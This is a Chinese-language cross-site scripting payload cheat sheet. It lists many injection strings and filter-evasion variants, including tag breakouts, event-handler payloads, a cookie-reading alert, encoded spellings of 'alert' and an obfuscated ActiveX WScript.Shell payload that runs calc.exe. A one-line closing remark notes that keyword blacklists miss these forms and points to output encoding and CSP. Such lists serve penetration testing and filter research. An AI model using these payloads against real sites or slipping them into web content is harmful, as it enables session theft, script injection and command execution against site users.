XSS payload 深入
xss payload
"><script>alert(1)</script>//
<img src=x onerror=alert(2)>
<svg /onload=alert`1`>
<embed src=//tiny.cc>
</textarea><script>alert(document.cookie)</script><textarea>
\"-confirm`1`//
</span><img src=x onerror=alert(1)><span>//
{{constructor.constructor('alert(6)')()}}
'javascript:eval:name'
Unicode 转义形式：
\\u003cscript\\u003ealert(document.cookie)\\u003cscript\\u003e
var o=new ActiveXObject("WScript.Shell")
o.run("calc.exe")
eval(String.fromCharCode(10,118,97,114,32,111,61,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,59,10,111,46,114,117,110,40,34,99,97,108,99,46,101,120,101,34,41,59))
<details open ontoggle=top[8680439..toString(30)](1);>
<details open ontoggle=top[11189117..toString(32)](1);>
<svg/onload=Set.constructor('al'%2b'ert(1)')()>
<q/oncut=open()>
<q/oncut=alert(1)>
<select autofocus onfocus=alert(1)>
<body onload=prompt(1)>
<aaaa id="c" onfocus=alert(1) tabindex=0>
<marquee/onstart=confirm(2)>
<svg>
<script>alert(/ 1/ ) </script>//
"src=# type=image onerror
="alert(1)
<img src=a onerror=top['alert'](2)>
al\u0065rt(1)
al%0aert(1)
top['al\145rt'](1)
top['al\x65rt'](1)
top["al"+"ert"](1)
a=alert,a(1)
<img src=x onerror=[1].find(alert)>
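转换为 30 进制：
(8680439).toString(30) 的结果是字符串 "alert"；上文的 11189117..toString(32) 同理。这类写法在源码中不出现 alert 字样，基于关键字的黑名单过滤无法识别，防御应依赖按输出上下文进行的编码和 CSP。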
eval((8680439).toString(30) )(666)
<script>eval((8680439).toString(30) )(666)
</script>